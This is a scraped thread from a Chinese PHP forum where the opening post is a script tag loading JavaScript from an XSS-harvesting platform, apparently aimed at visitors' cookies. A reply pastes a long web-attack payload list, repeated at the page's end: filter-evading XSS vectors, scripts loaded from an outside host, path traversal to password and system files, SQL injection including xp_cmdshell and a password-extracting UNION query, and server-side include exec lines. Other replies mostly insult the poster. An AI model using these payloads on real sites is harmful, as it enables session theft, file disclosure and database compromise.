登录
立即注册
首页
>
绿虎论坛
>
历史版块
>
编程
>
PHP
>
源码
<script src="http://xss.lq-e.cn/ index.php/Xss/index/uid/189"></ script></code>
罐子
@Ta
2014-05-12
3122点击
<script src="
http://xss.lq-e.cn/
index.php/Xss/index/uid/189"></
script></code>
隐藏样式
查看源码
回复列表(8|
隐藏机器人聊天
)
1
罐子
@Ta
/ 2014-05-12 /
样
/
源
><script>alert(document.cookie)</script>
2
罐子
@Ta
/ 2014-05-12 /
样
/
源
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<img src="javascript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini
/index.html
?.jsp
?.jsp
<script>alert(’Vulnerable’);</script>
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c:>c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’>out
<IMG SRC="javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"
<!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=
http://xss.ha.ckers.org/a.js
></SCRIPT>’"-->
<IMG SRC="
http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode
">
<SCRIPT a=">"SRC="
http://xss.ha.ckers.org/a.js
"></SCRIPT>
<SCRIPT =">"SRC="
http://xss.ha.ckers.org/a.js
"></SCRIPT>
<SCRIPT a=">"’’ SRC="
http://xss.ha.ckers.org/a.js
"></SCRIPT>
<SCRIPT"a=’>’"SRC="
http://xss.ha.ckers.org/a.js
"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="
http://xss.ha.ckers.org/a.js
"></SCRIPT>
<A HREF=
http://www.go
http://www.google.com/ogle.com/
>link</A>
3
小桑
@Ta
/ 2014-05-12 /
样
/
源
傻叼玩xss
4
2
@Ta
/ 2014-05-12 /
样
/
源
垃圾的xss平台
5
小蒋同学
@Ta
/ 2014-05-12 /
样
/
源
@
齐子
,
@
小桑
,他发的什么意思
6
2
@Ta
/ 2014-05-12 /
样
/
源
@
小蒋同学
百度一下xss
7
icEz
@Ta
/ 2014-05-12 /
样
/
源
.......
8
vpsender
@Ta
/ 2014-05-19 /
样
/
源
路过
添加新回复
回复需要
登录
。
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<img src="javascript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini
/index.html
?.jsp
?.jsp
<script>alert(’Vulnerable’);</script>
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c:>c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’>out
<IMG SRC="javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"
<!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://xss.ha.ckers.org/a.js></SCRIPT>’"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">"’’ SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT"a=’>’"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>